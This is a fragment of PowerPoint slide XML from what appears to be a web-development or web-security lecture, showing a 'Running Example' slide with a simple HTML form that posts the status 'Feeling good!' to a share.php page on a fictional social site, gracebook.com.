            </a:r>
            <a:endParaRPr sz="1867" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="33"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="2733" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933"/>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;form</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-53" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.gracebook.com/share.php</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-67" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"post"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="453"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;input</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"text" </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"Feeling </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>good!"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;&lt;/input&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="447"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;input </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"submit" </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-13" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"Share"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;&lt;/input&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="447"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="453"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="447"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/body&gt;&lt;/html&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8647684" y="3043090"/>
            <a:ext cx="3200400" cy="2866813"/>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4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8647684" y="3043089"/>
            <a:ext cx="3200400" cy="504411"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="385D89"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="133773" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="882205">
              <a:spcBef>
                <a:spcPts val="1053"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-40"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5" name="object 5"/>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6" name="object 6"/>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7" name="object 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1140528" y="1583181"/>
            <a:ext cx="7207673" cy="3447627"/>
            <a:chOff x="855395" y="1187386"/>
            <a:chExt cx="5405755" cy="2585720"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="object 8"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="855395" y="2848648"/>
              <a:ext cx="507199" cy="507199"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="object 9"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1451863" y="2893237"/>
              <a:ext cx="417906" cy="417906"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="900048" y="3355797"/>
              <a:ext cx="417906" cy="401243"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1453768" y="3358349"/>
              <a:ext cx="414185" cy="414185"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2514599" y="1200086"/>
              <a:ext cx="3733800" cy="1082675"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8831073" y="3595793"/>
            <a:ext cx="2920153" cy="2203027"/>
            <a:chOff x="6623304" y="2696845"/>
            <a:chExt cx="2190115" cy="1652270"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="object 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6636004"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5" name="object 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6636004"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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>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17" name="object 17"/>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18" name="object 18"/>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19" name="object 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1816607" y="2084663"/>
            <a:ext cx="4236720" cy="1264920"/>
            <a:chOff x="1362455" y="1563497"/>
            <a:chExt cx="3177540" cy="948690"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="object 20"/>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1" name="object 21"/>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2" name="object 22"/>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3" name="object 23"/>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4" name="object 24"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 25"/>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7"/>
              </a:rPr>
              <a:t>ww</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-167" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-53" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>acebook.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>om</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="object 26"/>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436777" y="4657005"/>
            <a:ext cx="131318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share.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-27" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>hp</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2946401" y="1583181"/>
            <a:ext cx="6249247" cy="2463800"/>
            <a:chOff x="2209800" y="1187386"/>
            <a:chExt cx="4686935" cy="184785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1200086"/>
              <a:ext cx="3733800" cy="1082675"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 20"/>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21" name="object 21"/>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22" name="object 22"/>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23" name="object 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1816607" y="2084663"/>
            <a:ext cx="4236720" cy="1264920"/>
            <a:chOff x="1362455" y="1563497"/>
            <a:chExt cx="3177540" cy="948690"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="object 24"/>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5" name="object 25"/>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6" name="object 26"/>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7" name="object 27"/>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8" name="object 28"/>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29" name="object 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3335867" y="3635756"/>
            <a:ext cx="5215467" cy="944880"/>
            <a:chOff x="2501900" y="2726817"/>
            <a:chExt cx="3911600" cy="708660"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="object 30"/>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31" name="object 31"/>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32" name="object 32"/>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33" name="object 33"/>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text=Feeling</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Good!</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="object 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="4173253"/>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657600" y="4173254"/>
            <a:ext cx="2413000" cy="361574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="33020" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="320031">
              <a:spcBef>
                <a:spcPts val="260"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>On</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>“Share”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>click</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="object 36"/>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7"/>
              </a:rPr>
              <a:t>ww</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-167" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-53" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>acebook.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>om</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="object 37"/>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010"/>
            <a:ext cx="14020800" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="19472">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Running</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-53" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8630751" y="3026156"/>
            <a:ext cx="3234267" cy="2900680"/>
            <a:chOff x="6473063" y="2269617"/>
            <a:chExt cx="2425700" cy="2175510"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="object 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6485763" y="2282317"/>
              <a:ext cx="2400300" cy="2150110"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2400300" h="2150110">
                  <a:moveTo>
                    <a:pt x="2400300" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2149856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2400300" y="2149856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2400300" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4F81BC"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6485763" y="2282317"/>
              <a:ext cx="2400300" cy="2150110"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2400300" h="2150110">
                  <a:moveTo>
                    <a:pt x="0" y="2149856"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2400300" y="2149856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2400300" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2149856"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="385D89"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
